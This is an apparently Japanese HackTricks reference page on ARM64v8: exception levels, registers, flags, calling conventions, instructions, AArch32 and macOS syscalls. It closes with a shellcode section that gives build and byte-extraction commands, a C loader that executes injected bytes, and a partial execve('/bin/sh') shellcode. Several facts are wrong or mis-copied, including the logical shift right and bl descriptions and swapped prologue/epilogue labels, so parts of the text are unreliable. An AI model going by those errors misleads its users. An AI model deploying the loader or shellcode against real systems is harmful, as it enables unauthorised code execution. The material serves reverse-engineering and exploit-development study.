ARM64v8の紹介
Reading time: 54 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
例外レベル - EL (ARM64v8)
ARMv8アーキテクチャでは、実行レベルは例外レベル(EL)として知られ、実行環境の特権レベルと機能を定義します。EL0からEL3までの4つの例外レベルがあり、それぞれ異なる目的を持っています。
- EL0 - ユーザーモード:
- これは最も特権の低いレベルで、通常のアプリケーションコードを実行するために使用されます。
- EL0で実行されるアプリケーションは互いに、またシステムソフトウェアから隔離されており、セキュリティと安定性が向上します。
- EL1 - オペレーティングシステムカーネルモード:
- ほとんどのオペレーティングシステムカーネルはこのレベルで実行されます。
- EL1はEL0よりも多くの特権を持ち、システムリソースにアクセスできますが、システムの整合性を確保するためにいくつかの制限があります。
- EL2 - ハイパーバイザーモード:
- このレベルは仮想化に使用されます。EL2で実行されるハイパーバイザーは、同じ物理ハードウェア上で複数のオペレーティングシステム(それぞれ独自のEL1で)を管理できます。
- EL2は仮想化環境の隔離と制御のための機能を提供します。
- EL3 - セキュアモニターモード:
- これは最も特権の高いレベルで、セキュアブートや信頼できる実行環境にしばしば使用されます。
- EL3はセキュア状態と非セキュア状態(セキュアブート、信頼できるOSなど)間のアクセスを管理および制御できます。
これらのレベルを使用することで、ユーザーアプリケーションから最も特権の高いシステムソフトウェアまで、システムのさまざまな側面を構造化された安全な方法で管理できます。ARMv8の特権レベルへのアプローチは、異なるシステムコンポーネントを効果的に隔離し、システムのセキュリティと堅牢性を向上させるのに役立ちます。
レジスタ (ARM64v8)
ARM64には31の汎用レジスタがあり、x0
からx30
までラベル付けされています。各レジスタは64ビット(8バイト)の値を格納できます。32ビットの値のみを必要とする操作では、同じレジスタを32ビットモードでw0
からw30
の名前でアクセスできます。
x0
からx7
- これらは通常、スクラッチレジスタとして使用され、サブルーチンにパラメータを渡すために使用されます。
- **
x0
**は関数の戻りデータも持ちます。
x8
- Linuxカーネルでは、x8
はsvc
命令のシステムコール番号として使用されます。macOSではx16が使用されます!x9
からx15
- より一時的なレジスタで、ローカル変数にしばしば使用されます。x16
とx17
- 手続き内呼び出しレジスタ。即時値のための一時的なレジスタです。また、間接関数呼び出しやPLT(手続きリンクテーブル)スタブにも使用されます。
x16
はmacOSにおける**svc
命令のシステムコール番号**として使用されます。
x18
- プラットフォームレジスタ。汎用レジスタとして使用できますが、一部のプラットフォームでは、このレジスタはプラットフォーム固有の用途に予約されています:Windowsの現在のスレッド環境ブロックへのポインタ、またはLinuxカーネルの現在実行中のタスク構造へのポインタ。x19
からx28
- これらは呼び出し側が保存するレジスタです。関数はこれらのレジスタの値を呼び出し元のために保持しなければならず、スタックに保存され、呼び出し元に戻る前に回復されます。x29
- スタックフレームを追跡するためのフレームポインタ。関数が呼び出されると新しいスタックフレームが作成され、x29
レジスタはスタックに保存され、新しいフレームポインタアドレス(sp
アドレス)がこのレジスタに保存されます。
- このレジスタは汎用レジスタとしても使用できますが、通常はローカル変数への参照として使用されます。
x30
またはlr
- リンクレジスタ。BL
(リンク付き分岐)またはBLR
(レジスタへのリンク付き分岐)命令が実行されるときに戻りアドレスを保持し、**pc
**値をこのレジスタに保存します。
- 他のレジスタと同様に使用することもできます。
- 現在の関数が新しい関数を呼び出す場合、
lr
を上書きするため、最初にスタックに保存します。これがエピローグです(stp x29, x30 , [sp, #-48]; mov x29, sp
->fp
とlr
を保存し、スペースを生成し、新しいfp
を取得)し、最後に回復します。これがプロローグです(ldp x29, x30, [sp], #48; ret
->fp
とlr
を回復し、戻ります)。
sp
- スタックポインタ。スタックのトップを追跡するために使用されます。
sp
の値は常に少なくともクワッドワードのアライメントを維持する必要があります。さもなければアライメント例外が発生する可能性があります。
pc
- プログラムカウンタ。次の命令を指します。このレジスタは例外生成、例外戻り、分岐を通じてのみ更新できます。このレジスタを読み取ることができる唯一の通常の命令は、分岐付きリンク命令(BL、BLR)で、pc
アドレスをlr
(リンクレジスタ)に保存します。xzr
- ゼロレジスタ。32ビットレジスタ形式では**wzr
とも呼ばれます。ゼロ値を簡単に取得するために使用できます(一般的な操作)またはsubs
を使用して比較を行うために使用できます(例:subs XZR, Xn, #10
は結果のデータをどこにも保存しません(xzr
**に)。
Wn
レジスタはXn
レジスタの32ビットバージョンです。
SIMDおよび浮動小数点レジスタ
さらに、最適化された単一命令複数データ(SIMD)操作や浮動小数点演算に使用できる128ビット長の32のレジスタがあります。これらはVnレジスタと呼ばれますが、64ビット、32ビット、16ビット、8ビットでも動作し、その場合は**Qn
、Dn
、Sn
、Hn
、Bn
**と呼ばれます。
システムレジスタ
数百のシステムレジスタ、特別目的レジスタ(SPR)とも呼ばれ、プロセッサの動作を監視および制御するために使用されます。
これらは専用の特別命令**mrs
およびmsr
**を使用してのみ読み取ったり設定したりできます。
特別レジスタ**TPIDR_EL0
およびTPIDDR_EL0
は、リバースエンジニアリングで一般的に見られます。EL0
の接尾辞は、レジスタにアクセスできる最小例外を示します(この場合、EL0は通常の例外(特権)レベルで、通常のプログラムが実行されます)。
これらは通常、メモリのスレッドローカルストレージ**領域のベースアドレスを保存するために使用されます。通常、最初のものはEL0で実行されるプログラムに対して読み書き可能ですが、2番目のものはEL0から読み取ることができ、EL1から書き込むことができます(カーネルのように)。
mrs x0, TPIDR_EL0 ; TPIDR_EL0をx0に読み取る
msr TPIDR_EL0, X0 ; x0をTPIDR_EL0に書き込む
PSTATE
PSTATEは、オペレーティングシステムが可視化する**SPSR_ELx
特別レジスタに直列化された複数のプロセスコンポーネントを含み、Xはトリガーされた例外の権限** レベルを示します(これにより、例外が終了したときにプロセス状態を回復できます)。
これらはアクセス可能なフィールドです:
.png)
N
、Z
、C
、および**V
**条件フラグ:- **
N
**は、操作が負の結果をもたらしたことを意味します。 - **
Z
**は、操作がゼロをもたらしたことを意味します。 - **
C
**は、操作がキャリーしたことを意味します。 - **
V
**は、操作が符号付きオーバーフローをもたらしたことを意味します: - 2つの正の数の合計が負の結果をもたらします。
- 2つの負の数の合計が正の結果をもたらします。
- 減算では、大きな負の数が小さな正の数から引かれた場合(またはその逆)、結果が与えられたビットサイズの範囲内で表現できない場合。
- 明らかに、プロセッサは操作が符号付きかどうかを知らないため、CとVを操作でチェックし、符号付きまたは符号なしの場合にキャリーが発生したかどうかを示します。
warning
すべての命令がこれらのフラグを更新するわけではありません。**CMP
やTST
のようなものは更新し、ADDS
**のようにsサフィックスを持つ他のものも更新します。
- 現在のレジスタ幅(
nRW
)フラグ:フラグが0の値を保持している場合、プログラムは再開時にAArch64実行状態で実行されます。 - 現在の例外レベル(
EL
):EL0で実行される通常のプログラムは値0を持ちます。 - 単一ステップフラグ(
SS
):デバッガによって使用され、例外を通じて**SPSR_ELx
**内でSSフラグを1に設定することによって単一ステップを実行します。プログラムは1ステップ実行し、単一ステップ例外を発生させます。 - 不正例外状態フラグ(
IL
):特権ソフトウェアが無効な例外レベル転送を実行したときにマークするために使用され、このフラグは1に設定され、プロセッサは不正状態例外をトリガーします。 - **
DAIF
**フラグ:これらのフラグは、特権プログラムが特定の外部例外を選択的にマスクできるようにします。 A
が1の場合、非同期中断がトリガーされることを意味します。I
は外部ハードウェア割り込み要求(IRQ)に応答するように設定します。Fは高速割り込み要求(FIR)に関連しています。- スタックポインタ選択フラグ(
SPS
):EL1以上で実行される特権プログラムは、自分のスタックポインタレジスタとユーザーモデルのスタックポインタ(例:SP_EL1
とEL0
)の間でスワップできます。この切り替えは、**SPSel
**特別レジスタに書き込むことによって行われます。これはEL0からは行えません。
呼び出し規約 (ARM64v8)
ARM64の呼び出し規約では、関数への最初の8つのパラメータはレジスタ**x0
からx7
に渡されます。追加のパラメータはスタックに渡されます。戻り値はレジスタx0
に返され、128ビット長の場合はx1
にも返されます。x19
からx30
およびsp
レジスタは、関数呼び出しの間に保持**されなければなりません。
アセンブリで関数を読むときは、関数のプロローグとエピローグを探します。プロローグは通常、フレームポインタ(x29
)の保存、新しいフレームポインタの設定、およびスタックスペースの割り当てを含みます。エピローグは通常、保存されたフレームポインタの復元と関数からの戻りを含みます。
Swiftにおける呼び出し規約
Swiftには独自の呼び出し規約があり、https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64で見つけることができます。
一般的な命令 (ARM64v8)
ARM64命令は一般的に形式 opcode dst, src1, src2
を持ち、opcode
は実行される操作(add
、sub
、mov
など)、dst
は結果が格納される宛先レジスタ、src1
およびsrc2
はソースレジスタです。即時値もソースレジスタの代わりに使用できます。
-
mov
: 値を1つのレジスタから別のレジスタに移動します。 -
例:
mov x0, x1
— これはx1
からx0
に値を移動します。 -
ldr
: メモリからレジスタに値をロードします。 -
例:
ldr x0, [x1]
— これはx1
が指すメモリ位置からx0
に値をロードします。 -
オフセットモード:元のポインタに影響を与えるオフセットが示されます。例えば:
-
ldr x2, [x1, #8]
、これはx1 + 8
からx2
に値をロードします。 -
ldr x2, [x0, x1, lsl #2]
、これは配列x0
から位置x1
(インデックス)* 4のオブジェクトをx2
にロードします。 -
プレインデックスモード:これは元に計算を適用し、結果を取得し、元の位置に新しい元を保存します。
-
ldr x2, [x1, #8]!
、これはx1 + 8
をx2
にロードし、x1
にx1 + 8
の結果を保存します。 -
str lr, [sp, #-4]!
、リンクレジスタをsp
に保存し、レジスタsp
を更新します。 -
ポストインデックスモード:これは前のものと似ていますが、メモリアドレスにアクセスし、その後オフセットが計算されて保存されます。
-
ldr x0, [x1], #8
、x1
をx0
にロードし、x1
をx1 + 8
で更新します。 -
PC相対アドレッシング:この場合、ロードするアドレスはPCレジスタに相対的に計算されます。
-
ldr x1, =_start
、これは_start
シンボルが始まるアドレスを現在のPCに関連付けてx1
にロードします。 -
str
: レジスタからメモリに値を保存します。 -
例:
str x0, [x1]
— これはx0
の値をx1
が指すメモリ位置に保存します。 -
ldp
: レジスタのペアをロードします。この命令は連続したメモリ位置から2つのレジスタをロードします。メモリアドレスは通常、別のレジスタの値にオフセットを加えることによって形成されます。 -
例:
ldp x0, x1, [x2]
— これはx2
およびx2 + 8
のメモリ位置からx0
とx1
をロードします。 -
stp
: レジスタのペアを保存します。この命令は連続したメモリ位置に2つのレジスタを保存します。メモリアドレスは通常、別のレジスタの値にオフセットを加えることによって形成されます。 -
例:
stp x0, x1, [sp]
— これはsp
およびsp + 8
のメモリ位置にx0
とx1
を保存します。 -
stp x0, x1, [sp, #16]!
— これはsp+16
およびsp + 24
のメモリ位置にx0
とx1
を保存し、sp
をsp+16
で更新します。 -
add
: 2つのレジスタの値を加算し、結果をレジスタに保存します。 -
構文:add(s) Xn1, Xn2, Xn3 | #imm, [shift #N | RRX]
-
Xn1 -> 宛先
-
Xn2 -> オペランド1
-
Xn3 | #imm -> オペランド2(レジスタまたは即時)
-
[shift #N | RRX] -> シフトを実行するか、RRXを呼び出します。
-
例:
add x0, x1, x2
— これはx1
とx2
の値を加算し、結果をx0
に保存します。 -
add x5, x5, #1, lsl #12
— これは4096に等しい(1を12回シフト)-> 1 0000 0000 0000 0000 -
adds
これはadd
を実行し、フラグを更新します。 -
sub
: 2つのレジスタの値を減算し、結果をレジスタに保存します。 -
add
の構文を確認してください。 -
例:
sub x0, x1, x2
— これはx1
からx2
の値を減算し、結果をx0
に保存します。 -
subs
これはsub
のようにフラグを更新します。 -
mul
: 2つのレジスタの値を乗算し、結果をレジスタに保存します。 -
例:
mul x0, x1, x2
— これはx1
とx2
の値を乗算し、結果をx0
に保存します。 -
div
: 1つのレジスタの値を別のレジスタで割り、結果をレジスタに保存します。 -
例:
div x0, x1, x2
— これはx1
をx2
で割り、結果をx0
に保存します。 -
lsl
、lsr
、asr
、ror
,rrx
: -
論理シフト左:末尾から0を追加し、他のビットを前方に移動させます(n回2倍)。
-
論理シフト右:先頭に1を追加し、他のビットを後方に移動させます(符号なしでn回2で割る)。
-
算術シフト右:**
lsr
**のように、最上位ビットが1の場合は0を追加するのではなく、1を追加します(符号付きでn回2で割る)。 -
右に回転:**
lsr
**のように、右から削除されたものを左に追加します。 -
拡張付き右回転:**
ror
**のように、キャリーフラグを「最上位ビット」として扱います。したがって、キャリーフラグはビット31に移動し、削除されたビットはキャリーフラグに移動します。 -
bfm
: ビットフィールド移動、これらの操作は値から0...n
ビットをコピーし、m..m+n
の位置に配置します。#s
は最左ビットの位置を指定し、#r
は右に回転する量を指定します。 -
ビットフィールド移動:
BFM Xd, Xn, #r
-
符号付きビットフィールド移動:
SBFM Xd, Xn, #r, #s
-
符号なしビットフィールド移動:
UBFM Xd, Xn, #r, #s
-
ビットフィールドの抽出と挿入:レジスタからビットフィールドをコピーし、別のレジスタにコピーします。
-
BFI X1, X2, #3, #4
X1の3ビット目からX2の4ビットを挿入します。 -
BFXIL X1, X2, #3, #4
X2の3ビット目から4ビットを抽出し、X1にコピーします。 -
SBFIZ X1, X2, #3, #4
X2から4ビットを符号拡張し、ビット位置3からX1に挿入します。右のビットはゼロにします。 -
SBFX X1, X2, #3, #4
X2の3ビット目から4ビットを抽出し、符号拡張してX1に配置します。 -
UBFIZ X1, X2, #3, #4
X2から4ビットをゼロ拡張し、ビット位置3からX1に挿入します。右のビットはゼロにします。 -
UBFX X1, X2, #3, #4
X2の3ビット目から4ビットを抽出し、ゼロ拡張された結果をX1に配置します。 -
符号拡張Xへの拡張:値の符号を拡張(または符号なしバージョンでは単に0を追加)して、操作を実行できるようにします:
-
SXTB X1, W2
W2からX1にバイトの符号を拡張します(W2
はX2
の半分です)。 -
SXTH X1, W2
W2からX1に16ビット数の符号を拡張します。 -
SXTW X1, W2
W2からX1にバイトの符号を拡張します。 -
UXTB X1, W2
W2からX1にバイトに0を追加します(符号なし)。 -
extr
:指定されたペアのレジスタを連結してビットを抽出します。 -
例:
EXTR W3, W2, W1, #3
これはW1+W2を連結し、W2のビット3からW1のビット3までを取得してW3に保存します。 -
cmp
: 2つのレジスタを比較し、条件フラグを設定します。これは**subs
**のエイリアスで、宛先レジスタをゼロレジスタに設定します。m == n
かどうかを知るのに便利です。 -
**
subs
**と同じ構文をサポートします。 -
例:
cmp x0, x1
— これはx0
とx1
の値を比較し、条件フラグを適切に設定します。 -
cmn
: 負のオペランドを比較します。この場合、これは**adds
**のエイリアスで、同じ構文をサポートします。m == -n
かどうかを知るのに便利です。 -
ccmp
: 条件付き比較で、これは前の比較が真であった場合にのみ実行され、特にnzcvビットを設定します。 -
cmp x1, x2; ccmp x3, x4, 0, NE; blt _func
-> x1 != x2かつx3 < x4の場合、funcにジャンプします。 -
これは**
ccmp
が前のcmp
がNE
であった場合にのみ実行されるため**、そうでない場合はビットnzcv
が0に設定され(blt
比較を満たさない)、使用されます。 -
これは
ccmn
としても使用できます(同じですが負の、cmp
対cmn
のように)。 -
tst
: 比較の値が両方とも1であるかどうかをチェックします(結果をどこにも保存せずにANDSのように動作します)。これは、レジスタの値と値を比較し、指定された値のビットのいずれかが1であるかどうかを確認するのに便利です。 -
例:
tst X1, #7
X1の最後の3ビットのいずれかが1であるかを確認します。 -
teq
: 結果を破棄するXOR操作。 -
b
: 無条件分岐。 -
例:
b myFunction
-
これはリンクレジスタに戻りアドレスを設定しないため(戻る必要があるサブルーチン呼び出しには適していません)。
-
bl
: リンク付き分岐、サブルーチンを呼び出すために使用されます。戻りアドレスをx30
に保存します。 -
例:
bl myFunction
— これは関数myFunction
を呼び出し、戻りアドレスをx30
に保存します。 -
これはリンクレジスタに戻りアドレスを設定しないため(戻る必要があるサブルーチン呼び出しには適していません)。
-
blr
: レジスタへのリンク付き分岐、ターゲットがレジスタで指定されるサブルーチンを呼び出すために使用されます。戻りアドレスをx30
に保存します。 -
例:
blr x1
— これはx1
に含まれるアドレスの関数を呼び出し、戻りアドレスをx30
に保存します。 -
ret
: サブルーチンから戻る、通常は**x30
**のアドレスを使用します。 -
例:
ret
— これは現在のサブルーチンから戻り、x30
の戻りアドレスを使用します。 -
b.<cond>
: 条件付き分岐。 -
b.eq
: 等しい場合に分岐、前のcmp
命令に基づいて。 -
例:
b.eq label
— 前のcmp
命令が2つの等しい値を見つけた場合、これはlabel
にジャンプします。 -
b.ne
: 等しくない場合に分岐。この命令は条件フラグをチェックし(前の比較命令によって設定された)、比較された値が等しくない場合、ラベルまたはアドレスに分岐します。 -
例:
cmp x0, x1
命令の後、b.ne label
—x0
とx1
の値が等しくない場合、これはlabel
にジャンプします。 -
cbz
: ゼロで比較し分岐。この命令はレジスタをゼロと比較し、等しい場合はラベルまたはアドレスに分岐します。 -
例:
cbz x0, label
—x0
の値がゼロの場合、これはlabel
にジャンプします。 -
cbnz
: 非ゼロで比較し分岐。この命令はレジスタをゼロと比較し、等しくない場合はラベルまたはアドレスに分岐します。 -
例:
cbnz x0, label
—x0
の値が非ゼロの場合、これはlabel
にジャンプします。 -
tbnz
: ビットをテストし、非ゼロの場合に分岐。 -
例:
tbnz x0, #8, label
-
tbz
: ビットをテストし、ゼロの場合に分岐。 -
例:
tbz x0, #8, label
-
条件付き選択操作:これらは条件ビットに応じて動作が変わる操作です。
-
csel Xd, Xn, Xm, cond
->csel X0, X1, X2, EQ
-> 真の場合、X0 = X1、偽の場合、X0 = X2 -
csinc Xd, Xn, Xm, cond
-> 真の場合、Xd = Xn、偽の場合、Xd = Xm + 1 -
cinc Xd, Xn, cond
-> 真の場合、Xd = Xn + 1、偽の場合、Xd = Xn -
csinv Xd, Xn, Xm, cond
-> 真の場合、Xd = Xn、偽の場合、Xd = NOT(Xm) -
cinv Xd, Xn, cond
-> 真の場合、Xd = NOT(Xn)、偽の場合、Xd = Xn -
csneg Xd, Xn, Xm, cond
-> 真の場合、Xd = Xn、偽の場合、Xd = - Xm -
cneg Xd, Xn, cond
-> 真の場合、Xd = - Xn、偽の場合、Xd = Xn -
cset Xd, Xn, Xm, cond
-> 真の場合、Xd = 1、偽の場合、Xd = 0 -
csetm Xd, Xn, Xm, cond
-> 真の場合、Xd = <すべて1>、偽の場合、Xd = 0 -
adrp
: シンボルのページアドレスを計算し、レジスタに保存します。 -
例:
adrp x0, symbol
— これはsymbol
のページアドレスを計算し、x0
に保存します。 -
ldrsw
: メモリから符号付き32ビット値をロードし、64ビットに符号拡張します。 -
例:
ldrsw x0, [x1]
— これはx1
が指すメモリ位置から符号付き32ビット値をロードし、64ビットに符号拡張してx0
に保存します。 -
stur
: レジスタ値をメモリ位置に保存し、別のレジスタからのオフセットを使用します。 -
例:
stur x0, [x1, #4]
— これはx0
の値をx1
のアドレスより4バイト大きいメモリアドレスに保存します。 -
svc
: システムコールを行います。「スーパーバイザコール」を意味します。この命令をプロセッサが実行すると、ユーザーモードからカーネルモードに切り替わり、カーネルのシステムコール処理コードがあるメモリの特定の位置にジャンプします。 -
例:
mov x8, 93 ; システムコール番号93をレジスタx8にロードします。
mov x0, 0 ; 終了ステータスコード0をレジスタx0にロードします。
svc 0 ; システムコールを行います。
関数プロローグ
- リンクレジスタとフレームポインタをスタックに保存:
stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement the stack pointer
- 新しいフレームポインタを設定する:
mov x29, sp
(現在の関数のために新しいフレームポインタを設定します) - ローカル変数のためにスタック上にスペースを割り当てる (必要な場合):
sub sp, sp, <size>
(ここで<size>
は必要なバイト数です)
関数エピローグ
- ローカル変数を解放する (割り当てられている場合):
add sp, sp, <size>
- リンクレジスタとフレームポインタを復元する:
ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment the stack pointer
- Return:
ret
(呼び出し元に制御を返すためにリンクレジスタのアドレスを使用)
AARCH32 実行状態
Armv8-Aは32ビットプログラムの実行をサポートしています。AArch32は2つの命令セットのいずれかで実行できます:A32
とT32
で、interworking
を介してそれらの間を切り替えることができます。
特権のある64ビットプログラムは、特権の低い32ビットプログラムへの例外レベル転送を実行することによって32ビットプログラムの実行をスケジュールできます。
64ビットから32ビットへの遷移は、例外レベルの低下と共に発生することに注意してください(例えば、EL1の64ビットプログラムがEL0のプログラムをトリガーする)。これは、AArch32
プロセススレッドが実行される準備ができたときに**SPSR_ELx
特別レジスタのビット4を1に設定することによって行われ、SPSR_ELx
の残りはAArch32
プログラムのCPSRを格納します。その後、特権プロセスはERET
命令を呼び出し、プロセッサはCPSRに応じてAArch32
に遷移し、A32またはT32に入ります。
interworking
はCPSRのJビットとTビットを使用して行われます。J=0
およびT=0
はA32
を意味し、J=0
およびT=1
はT32を意味します。これは基本的に、命令セットがT32であることを示すために最下位ビットを1に設定することに相当します。
これはinterworkingブランチ命令の間に設定されますが、PCが宛先レジスタとして設定されているときに他の命令で直接設定することもできます。例:
別の例:
_start:
.code 32 ; Begin using A32
add r4, pc, #1 ; Here PC is already pointing to "mov r0, #0"
bx r4 ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32)
.code 16:
mov r0, #0
mov r0, #8
レジスタ
16個の32ビットレジスタ(r0-r15)があります。r0からr14は任意の操作に使用できますが、そのうちいくつかは通常予約されています:
r15
: プログラムカウンタ(常に)。次の命令のアドレスを含みます。A32では現在 + 8、T32では現在 + 4です。r11
: フレームポインタr12
: 手続き内呼び出しレジスタr13
: スタックポインタr14
: リンクレジスタ
さらに、レジスタは**バンクレジスタ
にバックアップされます。これは、例外処理や特権操作において迅速なコンテキストスイッチを行うためにレジスタの値を保存する場所であり、毎回手動でレジスタを保存および復元する必要を回避します。
これは、例外が発生したプロセッサモードのCPSR
からSPSR
にプロセッサ状態を保存することによって行われます。例外から戻ると、CPSR
はSPSR
**から復元されます。
CPSR - 現在のプログラムステータスレジスタ
AArch32では、CPSRはAArch64の**PSTATE
と似たように機能し、例外が発生したときに後で実行を復元するためにSPSR_ELx
**に保存されます:
.png)
フィールドはいくつかのグループに分かれています:
- アプリケーションプログラムステータスレジスタ(APSR):算術フラグで、EL0からアクセス可能
- 実行状態レジスタ:プロセスの動作(OSによって管理される)。
アプリケーションプログラムステータスレジスタ(APSR)
N
、Z
、C
、**V
**フラグ(AArch64と同様)Q
フラグ:特定の飽和算術命令の実行中に整数飽和が発生した場合に1に設定されます。一度**1
**に設定されると、手動で0に設定されるまでその値を保持します。さらに、その値を暗黙的にチェックする命令はなく、手動で読み取る必要があります。GE
(以上または等しい)フラグ:これは、"並列加算"や"並列減算"などのSIMD(Single Instruction, Multiple Data)操作で使用されます。これらの操作は、単一の命令で複数のデータポイントを処理することを可能にします。
例えば、UADD8
命令は4つのバイトペア(2つの32ビットオペランドから)を並列に加算し、結果を32ビットレジスタに格納します。その後、これらの結果に基づいて**APSR
内のGE
フラグを設定します**。各GEフラグは、バイトペアの加算がオーバーフローしたかどうかを示します。
**SEL
**命令は、これらのGEフラグを使用して条件付きアクションを実行します。
実行状態レジスタ
- **
J
およびT
ビット:J
は0であるべきで、T
**が0の場合は命令セットA32が使用され、1の場合はT32が使用されます。 - ITブロック状態レジスタ(
ITSTATE
):これらは10-15および25-26のビットです。**IT
**接頭辞のグループ内の命令の条件を保存します。 - **
E
**ビット:エンディアンネスを示します。 - モードおよび例外マスクビット(0-4):現在の実行状態を決定します。5番目のビットは、プログラムが32ビット(1)または64ビット(0)で実行されているかを示します。他の4つは、現在使用中の例外モードを表します(例外が発生し、それが処理されているとき)。設定された番号は、他の例外がこの処理中にトリガーされた場合の現在の優先度を示します。
.png)
AIF
:特定の例外は、ビット**A
、I
、F
を使用して無効にできます。A
が1の場合、非同期中断がトリガーされることを意味します。I
は外部ハードウェア割り込み要求**(IRQ)に応答するように設定します。Fは高速割り込み要求(FIR)に関連しています。
macOS
BSDシステムコール
syscalls.masterを確認してください。BSDシステムコールはx16 > 0になります。
Machトラップ
syscall_sw.cのmach_trap_table
とmach_traps.hのプロトタイプを確認してください。Machトラップの最大数はMACH_TRAP_TABLE_COUNT
= 128です。Machトラップはx16 < 0になるため、前のリストから番号をマイナスで呼び出す必要があります:**_kernelrpc_mach_vm_allocate_trap
は-10
**です。
これら(およびBSD)システムコールを呼び出す方法を見つけるために、ディスアセンブラで**libsystem_kernel.dylib
**を確認することもできます:
# macOS
dyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e
# iOS
dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64
注意してください、Ida と Ghidra はキャッシュを通過させるだけで 特定の dylibs をデコンパイルすることもできます。
tip
時には ソースコード を確認するよりも libsystem_kernel.dylib
の デコンパイルされた コードをチェックする方が簡単です。なぜなら、いくつかのシステムコール(BSD と Mach)のコードはスクリプトを介して生成されているため(ソースコードのコメントを確認)、dylib では何が呼び出されているかを見つけることができます。
machdep コール
XNU はマシン依存の別のタイプのコールをサポートしています。これらのコールの数はアーキテクチャによって異なり、コールや数が一定であることは保証されていません。
comm ページ
これはカーネル所有のメモリページで、すべてのユーザープロセスのアドレス空間にマッピングされています。これは、ユーザーモードからカーネル空間への遷移を、カーネルサービスのためのシステムコールを使用するよりも速くすることを目的としています。この遷移は非常に非効率的になるためです。
例えば、gettimeofdate
コールは、comm ページから直接 timeval
の値を読み取ります。
objc_msgSend
この関数は Objective-C または Swift プログラムで非常に一般的に見られます。この関数は、Objective-C オブジェクトのメソッドを呼び出すことを可能にします。
パラメータ(ドキュメントの詳細):
- x0: self -> インスタンスへのポインタ
- x1: op -> メソッドのセレクタ
- x2... -> 呼び出されたメソッドの残りの引数
したがって、この関数への分岐の前にブレークポイントを置くと、lldb で何が呼び出されているかを簡単に見つけることができます(この例では、オブジェクトがコマンドを実行する NSConcreteTask
からオブジェクトを呼び出します):
# Right in the line were objc_msgSend will be called
(lldb) po $x0
<NSConcreteTask: 0x1052308e0>
(lldb) x/s $x1
0x1736d3a6e: "launch"
(lldb) po [$x0 launchPath]
/bin/sh
(lldb) po [$x0 arguments]
<__NSArrayI 0x1736801e0>(
-c,
whoami
)
tip
環境変数 NSObjCMessageLoggingEnabled=1
を設定すると、この関数が呼び出されたときに /tmp/msgSends-pid
のようなファイルにログを記録できます。
さらに、OBJC_HELP=1
を設定し、任意のバイナリを呼び出すことで、特定のObjc-Cアクションが発生したときに log するために使用できる他の環境変数を見ることができます。
この関数が呼び出されると、指定されたインスタンスの呼び出されたメソッドを見つける必要があります。そのために、さまざまな検索が行われます:
- 楽観的キャッシュ検索を実行:
- 成功した場合、完了
- runtimeLockを取得(読み取り)
- If (realize && !cls->realized) クラスを実現
- If (initialize && !cls->initialized) クラスを初期化
- クラス自身のキャッシュを試す:
- 成功した場合、完了
- クラスメソッドリストを試す:
- 見つかった場合、キャッシュを埋めて完了
- スーパークラスキャッシュを試す:
- 成功した場合、完了
- スーパークラスメソッドリストを試す:
- 見つかった場合、キャッシュを埋めて完了
- If (resolver) メソッドリゾルバを試し、クラス検索から繰り返す
- まだここにいる場合(= 他のすべてが失敗した場合)フォワーダーを試す
Shellcodes
コンパイルするには:
as -o shell.o shell.s
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib
# You could also use this
ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem
バイトを抽出するには:
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh
for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
done
新しいmacOSの場合:
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/fc0742e9ebaf67c6a50f4c38d59459596e0a6c5d/helper/extract.sh
for s in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n $s | awk '{for (i = 7; i > 0; i -= 2) {printf "\\x" substr($0, i, 2)}}'
done
シェルコードをテストするためのCコード
// code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c
// gcc loader.c -o loader
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] = "<INSERT SHELLCODE HERE>";
int main(int argc, char **argv) {
printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
printf("[+] SUCCESS: mmap\n");
printf(" |-> Return = %p\n", ptr);
void *dst = memcpy(ptr, shellcode, sizeof(shellcode));
printf("[+] SUCCESS: memcpy\n");
printf(" |-> Return = %p\n", dst);
int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);
if (status == -1) {
perror("mprotect");
exit(-1);
}
printf("[+] SUCCESS: mprotect\n");
printf(" |-> Return = %d\n", status);
printf("[>] Trying to execute shellcode...\n");
sc = ptr;
sc();
return 0;
}
シェル
こちらから取得し、説明されています。
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
_main:
adr x0, sh_path ; This is the address of "/bin/sh".
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
mov x16, #59 ; Move the execve syscall number (59) into x16.
